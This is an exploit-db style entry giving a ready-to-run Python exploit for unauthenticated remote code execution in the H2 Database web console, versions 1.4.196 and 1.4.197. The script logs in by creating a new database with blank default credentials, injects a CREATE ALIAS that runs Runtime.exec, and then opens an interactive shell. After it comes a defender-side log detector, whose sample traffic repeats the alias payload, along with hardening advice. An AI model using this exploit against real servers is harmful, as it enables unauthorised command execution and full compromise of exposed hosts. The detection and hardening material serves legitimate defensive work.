H2 Database 1.4.196 - Remote Code Execution
Source: vfocus.net  Author: h4ckNinja  Published: 2018-10-08
# Exploit Title: H2 Database 1.4.196 - Remote Code Execution
# Google Dork: N/A
# Date: 2018-09-24
# Exploit Author: h4ckNinja
# Vendor Homepage: https://www.h2database.com/
# Software Link: http://www.h2database.com/h2-2018-03-18.zip
# Version: 1.4.196 and 1.4.197
# Tested on: macOS/Linux
# CVE: N/A
 
# This takes advantage of the CREATE ALIAS RCE (https://www.exploit-db.com/exploits/44422/).
# When the test database has a password that is unknown, it is still possible to get code execution
# by creating a new database. The web console allows this by entering the name of the new database
# in the connection string. When the new database is created, it gets the default credentials of
# username "sa" and password "" (blank), and the attacker is logged in automatically.
# The attached Python code, modified from 44422, demonstrates this.
 
#!/usr/bin/env python
 
'''
Exploit Title: Unauthenticated RCE
Date: 2018/09/24
Exploit Author: h4ckNinja
Vendor: http://www.h2database.com/
Version: all versions
Tested on: Linux, Mac
Description: Building on the Alias RCE, there's an authentication bypass to create a database, and then login to that one.
Modified from: https://www.exploit-db.com/exploits/44422/
'''
 
import random
import string
import sys
import argparse
import html
import requests
 
 
def getSession(host):
    url = 'http://{}'.format(host)
    r = requests.get(url)
    path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('.jsp', '.do')
 
    return '{}/{}'.format(url, path)
 
def login(url, database):
    data = {
        'language': 'en',
        'setting': 'Generic H2 (Embedded)',
        'name': 'Generic H2 (Embedded)',
        'driver': 'org.h2.Driver',
        'url': database,
        'user': 'sa',
        'password': ''
    }
 
    print('[*] Attempting to create database')
    r = requests.post(url, data=data)
 
    if '<th class="login">Login</th>' in r.text:
        return False
 
    print('[+] Created database and logged in')
 
    return True
 
def prepare(url):
    cmd = '''CREATE ALIAS EXECVE AS $$ String execve(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A"); return s.hasNext() ? s.next() : "";  }$$;'''
    url = url.replace('login', 'query')
 
    print('[*] Sending stage 1')
 
    r = requests.post(url, data={'sql': cmd})
 
    if 'NullPointerException' not in r.text:
        print('[+] Shell succeeded - ^c or quit to exit')
        return url
 
    return False
 
def execve(url, cmd):
    r = requests.post(url, data={'sql':"CALL EXECVE('{}')".format(cmd)})
 
    try:
        # Pull the single result cell out of the console's HTML table and undo its HTML formatting
        execHTML = html.unescape(r.text.split('</th></tr><tr><td>')[1].split('</td>')[0]
                                 .replace('<br />', '\n').replace('&nbsp;', ' '))
        print(execHTML)
 
    except Exception as e:
        print('[-] Invalid command (' + str(e) + ')')
 
 
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    randString = ''.join(random.choices(string.ascii_letters + string.digits, k=5))
 
    parser.add_argument('-H',
            '--host',
            dest='host',
            metavar='127.0.0.1:8082',
            help='Specify a host',
            required=True)
 
    parser.add_argument('-d',
            '--database-url',
            dest='database',
            metavar='jdbc:h2:~/emptydb-' + randString,
            default='jdbc:h2:~/emptydb-' + randString,
            help='Database URL',
            required=False)
 
    args = parser.parse_args()
 
    url = getSession(args.host)

    if login(url, args.database):
        success = prepare(url)

        if success:
            while True:
                try:
                    cmd = input('h2-shell$ ')

                    if 'quit' not in cmd:
                        execve(success, cmd)

                    else:
                        print('[+] Shutting down')
                        sys.exit(0)

                except KeyboardInterrupt:
                    print()
                    print('[+] Shutting down')
                    sys.exit(0)

        else:
            print('[-] Something went wrong injecting the payload.')

    else:
        print('[-] Unable to login')
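A defender-side counterpart to the two steps the exploit relies on (a console login whose connection string names a database that does not exist yet, followed by a CREATE ALIAS with a Java source body and a CALL of that alias), added here as an example; it is not part of the original exploit-db entry and not code from the H2 project. It scans request log lines of the form "METHOD PATH BODY" as a reverse proxy in front of the console might record them; that log format, the allowlist KNOWN_DATABASES, the jsessionid value and the sample traffic are all assumptions constructed for the example.

```python
"""Flag H2 web-console requests that create a database on the fly or define Java aliases."""
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Assumption: operators maintain an allowlist of JDBC URLs the console is expected to open.
KNOWN_DATABASES = {"jdbc:h2:~/test"}

# CREATE ALIAS with a $$-delimited body carries Java source that H2 compiles and runs.
CREATE_ALIAS_RE = re.compile(
    r"\bCREATE\s+ALIAS\s+(?:IF\s+NOT\s+EXISTS\s+)?(\w+)\s+AS\s+\$\$", re.I)
CALL_RE = re.compile(r"\bCALL\s+(\w+)\s*\(", re.I)


def _login(url, user, password):
    # Same form fields the console's login.do expects; the jsessionid value is made up.
    body = urlencode({"language": "en", "setting": "Generic H2 (Embedded)",
                      "name": "Generic H2 (Embedded)", "driver": "org.h2.Driver",
                      "url": url, "user": user, "password": password})
    return "POST /login.do?jsessionid=c0ffee " + body


def _query(sql):
    return "POST /query.do?jsessionid=c0ffee " + urlencode({"sql": sql})


# Constructed sample traffic in the shape "METHOD PATH BODY", as a reverse proxy might log it.
SAMPLE_LOG = [
    "GET /login.jsp?jsessionid=c0ffee",
    _login("jdbc:h2:~/test", "sa", "s3cret"),            # allowlisted database: benign
    _login("jdbc:h2:~/emptydb-Ab3xZ", "sa", ""),         # unknown database, blank password
    _query("CREATE ALIAS EXECVE AS $$ String execve(String cmd) { return cmd; }$$;"),
    _query("CALL EXECVE('id')"),
    _query("SELECT 1"),
    _login("jdbc:h2:~/other;IFEXISTS=TRUE", "sa", ""),  # cannot create a database: not flagged
]


def parse_line(line):
    """Split 'METHOD PATH BODY' into the method, the path without query string, and the form."""
    parts = line.split(" ", 2)
    method, path = parts[0], urlsplit(parts[1]).path
    body = parts[2] if len(parts) > 2 else ""
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return method, path, form


def analyze(lines, known_databases=KNOWN_DATABASES):
    """Return (line_no, rule, detail) findings; alias CALLs are tied to earlier definitions."""
    findings = []
    defined_aliases = set()
    for line_no, line in enumerate(lines, 1):
        method, path, form = parse_line(line)
        if method != "POST":
            continue
        if path.endswith("/login.do"):
            url = form.get("url", "")
            # IFEXISTS=TRUE is H2's URL setting that refuses to create a missing database,
            # so a login carrying it cannot be the implicit-creation step.
            if url and url not in known_databases and "IFEXISTS=TRUE" not in url.upper():
                detail = "new database '{}' with user '{}'".format(url, form.get("user", ""))
                if form.get("password", "") == "":
                    detail += " and blank password"
                findings.append((line_no, "implicit-db-create", detail))
        elif path.endswith("/query.do"):
            sql = form.get("sql", "")
            match = CREATE_ALIAS_RE.search(sql)
            if match:
                defined_aliases.add(match.group(1).upper())
                findings.append((line_no, "java-alias-defined", match.group(1)))
            for alias in CALL_RE.findall(sql):
                if alias.upper() in defined_aliases:
                    findings.append((line_no, "java-alias-called", alias))
    return findings


if __name__ == "__main__":
    for line_no, rule, detail in analyze(SAMPLE_LOG):
        print("line {:>2}  {:<20} {}".format(line_no, rule, detail))
```

The first rule is only needed where the console can still create databases: starting the H2 server with its `-ifExists` option (or keeping `-webAllowOthers` unset so the console is not reachable from other hosts) removes that step, and the alias rules alone then cover the CREATE ALIAS path that 44422 already described.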
 